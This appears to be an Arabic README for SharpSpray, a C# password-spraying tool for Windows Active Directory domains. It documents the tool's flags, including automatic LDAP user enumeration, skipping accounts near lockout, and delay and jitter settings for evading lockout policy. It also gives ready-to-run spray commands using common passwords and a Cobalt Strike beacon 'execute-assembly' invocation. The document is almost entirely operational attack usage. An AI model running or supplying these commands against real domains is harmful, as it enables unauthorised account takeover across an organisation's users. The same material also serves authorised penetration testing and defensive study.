
أداة رش كلمات المرور لـ Active Directory. تجلب قائمة المستخدمين تلقائيًا وتتجنب الإغلاقات المحتملة.
SharpSpray هي أداة رش كلمات المرور لنطاق Windows مكتوبة بلغة .NET C#.
SharpSpray هي نسخة بلغة C# من DomainPasswordSpray مع إمكانيات محسّنة وإضافية. تستخدم هذه الأداة بروتوكول LDAP للتواصل مع خدمات الدليل النشط للنطاق.
> SharpSpray.exe --help
-v, --Verbose عرض الرسائل التفصيلية.
-u (اختياري) مسار ملف قائمة أسماء المستخدمين. سيتم جلبها تلقائيًا من Active Directory إذا لم يتم تحديدها.
-p كلمة مرور واحدة أو قائمة مفصولة بـ '|' سيتم استخدامها لتنفيذ رش كلمات المرور.
-k, --pl (اختياري) مسار ملف قائمة كلمات المرور.
-d (اختياري) تحديد اسم النطاق.
-m استخدم هذا الخيار في حالة الرش من جهاز موجود خارج سياق النطاق.
-q, --dc-ip مطلوب عند تفعيل الخيار 'm' (خارج النطاق).
-x محاولة استبعاد الحسابات المعطلة
من قائمة المستخدمين (غير مدعوم مع الخيار -m).
-z استبعاد الحسابات التي على وشك القفل
(غير مدعوم مع الخيار -m).
-f مرشح LDAP مخصص للمستخدمين، مثل "(description=*admin*)"
-o ملف لإخراج النتائج إليه.
-w عدم الاعتماد على إعدادات نافذة مراقبة القفل في النطاق واستخدام هذه القيمة المحددة. (الافتراضي 32 دقيقة)
-s (اختياري) التأخير بالثواني بين كل محاولة مصادقة.
-j (اختياري) التذبذب بالثواني.
--Force فرض البدء دون طلب تأكيد.
--get-users-list الحصول على قائمة مستخدمي النطاق من Active Directory.
--show-examples عرض أمثلة الاستخدام.
--show-args عرض وسائط سطر الأوامر.
--help عرض شاشة المساعدة هذه.
SharpSpray.exe -v -x -z --pl password.txt
SharpSpray.exe -v -x -z -p "Passw0rd|Admin@123|Admin@2022"
SharpSpray.exe -v -x -z -p "Passw0rd"
SharpSpray.exe -x -z -u users.txt --pl psswd.txt
SharpSpray.exe -x -z -u users.txt -p Passw0rd!
SharpSpray.exe -x -z -s 3 -j 1 -u users.txt -k psswd.txt -o sprayed.txt
SharpSpray.exe -w 32 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe -w 32 -s 3 -j 1 -m -d DC-1.local --dc-ip 10.10.20.20 -u users.txt --pl psswd.txt
SharpSpray.exe --get-users-list
SharpSpray.exe --get-users-list > users.txt
PS> .\SharpSpray.exe --get-users-list | Out-File -Encoding ascii users.txt
* الاستخدام في Cobalt Strike:
beacon> execute-assembly C:\Users\sec\Desktop\tmp\sharpspray.exe --Force -w 32 -s 3 -j 1 -x -z -v -p "Passw0rd|Admin@123|Admin@2022"
* التحقق من المهام في Cobalt:
beacon> jobs
سيقوم الأمر التالي بجلب مستخدمي النطاق وطباعة القائمة على وحدة التحكم.
SharpSpray.exe -x -z --get-users-list
-x: استبعاد الحسابات المعطلة من قائمة المستخدمين.
-z: استبعاد الحسابات التي على وشك القفل.